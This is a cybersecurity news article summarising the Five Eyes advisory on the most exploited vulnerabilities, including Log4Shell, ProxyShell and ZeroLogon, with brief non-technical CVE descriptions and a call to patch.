The most exploited cyber security vulnerabilities

Graphic showing a red unlocked padlock surrounded by blue locked padlocks
(Image credit: Shutterstock)

The Five Eyes alliance has once again revealed its annual list of the most routinely exploited security vulnerabilities, with Log4Shell among the most abused weaknesses of the year.

The intelligence alliance comprising the UK, US, Australia, Canada, and New Zealand revealed that the most exploited security weaknesses affected a range of products across both public and private sectors.

Internet-facing systems such as email and virtual private networks (VPNs) were targeted particularly heavily, with threat actors routinely exploiting publicly-known and unpatched years-old vulnerabilities.

Flaws in Microsoft Exchange also dominated the list with three vulnerabilities culminating in the ProxyShell weakness, four vulnerabilities culminating in the ProxyLogon weakness, and the ZeroLogon vulnerability all featuring on the top 15 list.

The advisories are published annually and are intended to provide organisations with the information needed to effectively prioritise their mitigation strategies.

“The NCSC and our allies are committed to raising awareness of vulnerabilities and presenting actionable solutions to mitigate them, “ said Lindy Cameron, CEO at NCSC. “This advisory places the power in the hands of network defenders to fix the most common cyber weaknesses in the public and private sector ecosystem.”

“Working with our international partners, we will continue to raise awareness of the threats posed by those who seek to harm us.”

Three of the top 15 vulnerabilities were also included in last year’s top 15, indicating that organisations are failing to patch publicly known, dangerous security weaknesses.

Five Eyes also said in its joint advisory that proof-of-concept code was typically published within two weeks of the public disclosure of the top vulnerabilities. Such quick distribution of exploitation methodology facilitated a broader range of threat actors to capitalise on the weakness, it said.

Patch now: The 30 most-exploited security vulnerabilities

Log4Shell - CVE-2021-44228 - many systems: A flaw in an Apache Java library that can be found in most organisations’ environments around the world. It has been given a 10/10 severity score and a litany of exploit attempts have been made since its December discovery.

ProxyShell - CVE-2021-34523, CVE-2021-34473, CVE-2021-31207: Microsoft Exchange Server: A privilege escalation flaw that could lead to code execution with a 9.8 severity rating, the ProxyShell vulnerability required a three-vulnerability attack chain in order to exploit and led to a score of different attacks, including some by nation-state actors.

ProxyLogon - CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, CVE-2021-26855 - Microsoft Exchange Server: ProxyLogon was another serious flaw with a multiple-vulnerability attack chain. Like ProxyShell, it was used to launch an array of attacks throughout 2021 including ransomware and other malware such as SquirrelWaffle. ProxyLogon allowed attacker to execute arbitrary code remotely with little technical expertise, according to Microsoft’ advisories.

Zoho - CVE-2021-40539 - ManageEngine ADSelfService Plus: An authentication bypass flaw in Zoho’s password management and single sign-on (SSO) product that could lead to the discovery of domain accounts and the archiving of files.

Atlassian - CVE-2021-26084 - Confluence Server and Data Center: A 9.8-rated code execution flaw which 'massively' exploited in 2021.

VMware - CVE-2021-21972 - vSphere Client, ESXi: A remote code execution vulnerability exists in a VMware vCenter Server plugin that was given a 9.8 severity rating.

Microsoft - CVE-2020-0688 - Microsoft Exchange: A remote code execution vulnerability was found in the Microsoft Exchange software and can be exploited when the application fails to properly handle objects in memory.

ZeroLogon - CVE-2020-1472 - Netlogon Remote Protocol: This elevation of privilege vulnerability exists when a hacker establishes a vulnerable Netlogon secure channel connection to a domain controller. Attackers who exploit the flaw can run a specially crafted application on a device on the network.

Ivanti - CVE 2019-11510 - Pulse Connect Secure: Hackers exploited the popular SSL VPN platform used by large organisations and governments to gain access to vulnerable networks. The flaw was even used in Sodinokibi ransomware attacks.

Fortinet - CVE 2018-13379 - FortiOS: A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.

Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104 - File Transfer Appliance (FTA): In February last year, Accellion patched four flaws in its FTA tool after detecting that fewer than customers were targeted earlier in the year. Cyber security agencies around the world later warned, however, that hackers had continued to exploit the vulnerabilities to target multiple layers of government in the US.

VMware - CVE-2021-21985 - vCenter Server: VMware warned customers in May this year that ransomware gangs were primed to exploit vulnerabilities in the vSphere Client to launch attacks. The flaw involves a lack of input validation in the Virtual SAN Health Check plugin, which is enabled by default in the system.

Ivanti - CVE-2021-22893 - Pulse Secure: At least two major hacking groups deployed a dozen malware families to exploit flaws in Pulse Connect Secure’s suite of VPNs to spy on the US defence sector in 2021. The NCSC issued guidance for businesses in May 2021 to update their Pulse Connect Secure systems to version 9.1R.11.4.

Citrix - CVE-2019-19781 - various products: Several organisations were targeted in early January through a flaw in Application Delivery Controller (ADC), Citrix Gateway and Citrix SD-WAN that allowed hackers to perform arbitrary code execution on a network.

Telerik - CVE 2019-18935 - Telerik UI for ASP.NET AJAX: Hackers have been exploiting an RCE flaw in this widely used suite of UI components for web applications since December 2019. The vulnerability insecurely deserialises JSON objects in a way that results in RCE of the software’s underlying host.

Microsoft - CVE-2017-11882 - Microsoft Office: Discovered in 2017, this is an RCEbug that exists when the software fails to properly handle objects in memory. If a user is logged in with admin rights, an attacker could take control of the affected system.

Sitecore - CVE-2021-42237 - Sitecore XP: A small number of specific software releases were vulnerable to an insecure deserialisation attack through which an attacker could achieve RCE with no authentication.

ForgeRock - ​​CVE-2021-35464 - ForgeRock AM Server: A Java deserilisation vulnerability was found in the jato.pageSession parameter that could lead to unauthenticated RCE by sending a specially crafted request to the server.

SonicWall - CVE-2021-20038 - various products: SonicWall published a string of patches for vulnerabilities affecting Secure Mobile Access products with this one in particular, an unauthenticated RCE flaw caused by a stack-based buffer overflow, being the most severe of the lot with a score of 9.8.

Microsoft - CVE-2021-40444 - MSHTML: An RCE in Microsoft’s old browser engine, used in the Internet Explorer days, was targeted using specially crafted Office documents. Attackers achieved RCE if they could convince the user to open the malicious document.

Microsoft - CVE-2021-34527 - Windows Print Spooler: Attackers could run arbitrary code with system-level privileges if this vulnerability was exploited. The vulnerability occurred with the Windows Print Spooler service improperly performed privileged file operations.

Linux - CVE-2021-3156 - sudo, various products: The sudo program in Linux, which allows users to run applications with the security privileges of another user, was fund to have a heap-based buffer overflow flaw that could lead to privilege escalation.

Checkbox Survey - CVE-2021-27852 - Checkbox Survey: This severe (9.8/10) vulnerability found in CheckboxWeb.dll allowed an unauthenticated attacker to execute code on a victim’s machine from anywhere in the world. This issue affected all version of Checkbox Survey prior to version 7.

SonicWall - CVE-2021-20016 - SSLVPN SMA100: An unauthenticated remote attacker could exploit this vulnerability by performing a special SQL query in order to access login credentials and other session-related information.

Microsoft - CVE-2021-1675 - Windows Print Spooler: An RCE was found that allowed an attacker to execute arbitrary code by exploiting a flaw in the way the component failed to restrict access to certain functionality.

QNAP - CVE-2020-2509 - QTS and QTS Hero: A 9.8-rated vulnerability, it allowed attackers to execute arbitrary commands in a compromised application.

Cisco - CVE-2018-0171 - IOS and IOS XE: Around 250,000 Cisco network switches running either IOS or IOS XE software were vulnerable to an attack that could lead to RCE or the triggering of a denial-of-service condition.

Microsoft - CVE-2017-0199 - various products: The high-complexity vulnerability could have led to RCE due to the way Office and WordPad parse specially crafted files. Successful exploitation could lead to an attacker taking full control of a system.

Connor Jones
News and Analysis Editor

Connor Jones has been at the forefront of global cyber security news coverage for the past few years, breaking developments on major stories such as LockBit’s ransomware attack on Royal Mail International, and many others. He has also made sporadic appearances on the ITPro Podcast discussing topics from home desk setups all the way to hacking systems using prosthetic limbs. He has a master’s degree in Magazine Journalism from the University of Sheffield, and has previously written for the likes of Red Bull Esports and UNILAD tech during his career that started in 2015.